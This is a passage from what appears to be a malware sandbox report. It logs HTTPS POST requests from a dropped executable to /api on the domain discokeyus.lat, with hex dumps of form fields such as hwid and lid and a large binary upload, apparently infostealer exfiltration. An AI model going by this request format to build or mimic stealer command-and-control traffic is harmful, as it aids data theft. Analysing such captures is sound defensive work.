                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=U1Z9T4NTZDBJS
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20407
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:31 UTC15331OUTData Raw: 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42 4a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42 4a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42 4a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42
                                                                                                                                                                                                                                                              Data Ascii: --U1Z9T4NTZDBJSContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--U1Z9T4NTZDBJSContent-Disposition: form-data; name="pid"3--U1Z9T4NTZDBJSContent-Disposition: form-data; name="lid"PsFKDg--pablo--U1Z9T4NTZDB
                                                                                                                                                                                                                                                              2024-12-22 01:18:31 UTC5076OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                              2024-12-22 01:18:32 UTC1136INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:32 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=n7dq3r8g2pa651648usgnc3ps4; expires=Wed, 16 Apr 2025 19:05:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKlGPCzok22VjbobCMloTpeGV5TOPH6bPcsw%2F25qa9Db6UxqWXLlrtgPM4PcqsTsc8p5AXFjJrL%2By3qQ3R%2BovsWhX72hx%2FA4Zb%2Fqb3%2BNSywKt3xeTEgTlbiQkAv0Qg735w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c4746087943d5-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1711&rtt_var=649&sent=16&recv=23&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21362&delivery_rate=1678160&cwnd=241&unsent_bytes=0&cid=15628eb7148af287&ts=1029&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              36192.168.2.450168104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=NIKTZ1E7HKB
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 549819
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: --NIKTZ1E7HKBContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--NIKTZ1E7HKBContent-Disposition: form-data; name="pid"1--NIKTZ1E7HKBContent-Disposition: form-data; name="lid"PsFKDg--pablo--NIKTZ1E7HKBCont
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: f1 83 a4 36 7e ea 3a c6 c4 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 bf
                                                                                                                                                                                                                                                              Data Ascii: 6~:e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: ef 31 cd d2 21 03 79 3e 56 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d ed
                                                                                                                                                                                                                                                              Data Ascii: 1!y>VrRZ'R%0Zo[TqeuJ*`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/Kv*tQ!3K4+EVh}8%tGJ:Ky.!,.v=0m
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: 94 34 a6 19 bd bc f5 2c 96 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 72
                                                                                                                                                                                                                                                              Data Ascii: 4,*.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim|quzqZ1&r
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: 28 07 51 96 c2 a4 9e 71 d0 ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db 13
                                                                                                                                                                                                                                                              Data Ascii: (Qq^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: a4 66 2a c7 fd 48 d4 0d 26 c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 93
                                                                                                                                                                                                                                                              Data Ascii: f*H&=z~XV86E|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;*;f[ 8$oaq"^~kn
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: ea f4 f6 f9 6f 37 aa 49 e9 ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 71
                                                                                                                                                                                                                                                              Data Ascii: o7IEMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8Cq
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: 05 21 25 41 c6 8a 6d c4 a3 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c d2
                                                                                                                                                                                                                                                              Data Ascii: !%Am6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=|XuvD7YPFOK<OX0/~h- Gy7e`9:y|:pbl
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: 19 c0 69 3b fa 01 59 dc 39 d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d d9
                                                                                                                                                                                                                                                              Data Ascii: i;Y9.CT~w['@+FX3B?tb7Ikf[%&B|@Pd?i>j,}up#KEF\#t63Yc+O|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~M
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC15331OUTData Raw: 35 07 f5 4c be 48 e7 91 93 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 dd
                                                                                                                                                                                                                                                              Data Ascii: 5LH7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{
                                                                                                                                                                                                                                                              2024-12-22 01:18:39 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:39 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=05do9pgmrs8dacoiojj3saond0; expires=Wed, 16 Apr 2025 19:05:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdcZMymmeJZhYv35y52W9TBlSuU87D2yKD2Qx5eUBx30oiGvVmjlByxGwwG0TpFvACVbCf6hs144rSsqQFlCSPZEifO0g4gBdXV38A4AgUoIzP%2B0OQ0gsFfBgrnF4IuVbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c475f9c114364-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1765&rtt_var=679&sent=328&recv=572&lost=0&retrans=0&sent_bytes=2831&recv_bytes=552291&delivery_rate=1654390&cwnd=206&unsent_bytes=0&cid=09893c6d11ca1e3f&ts=4241&x=0"


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              37192.168.2.450169104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=2HJM9ZLTZOA
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1331
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:35 UTC1331OUTData Raw: 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: --2HJM9ZLTZOAContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--2HJM9ZLTZOAContent-Disposition: form-data; name="pid"1--2HJM9ZLTZOAContent-Disposition: form-data; name="lid"PsFKDg--pablo--2HJM9ZLTZOACont
                                                                                                                                                                                                                                                              2024-12-22 01:18:36 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:36 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=gp3bic8e4rfkdk9el3icnq7c07; expires=Wed, 16 Apr 2025 19:05:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5REP1dnsgzMV7g7yssN%2BO1lY6c4sUrYN3csvwwEf1xDQXRFkUFfdYw%2FLE4xMgdADzbYVUWvELdHvL%2Brp%2FteX0UBRyLbDZppM4wXd4Y5OxX%2FlsFFABCrpBNNums7SFU99w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47618f120f98-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1553&rtt_var=590&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2239&delivery_rate=1880231&cwnd=182&unsent_bytes=0&cid=7316d7d5027c4907&ts=775&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              38192.168.2.450174104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:40 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
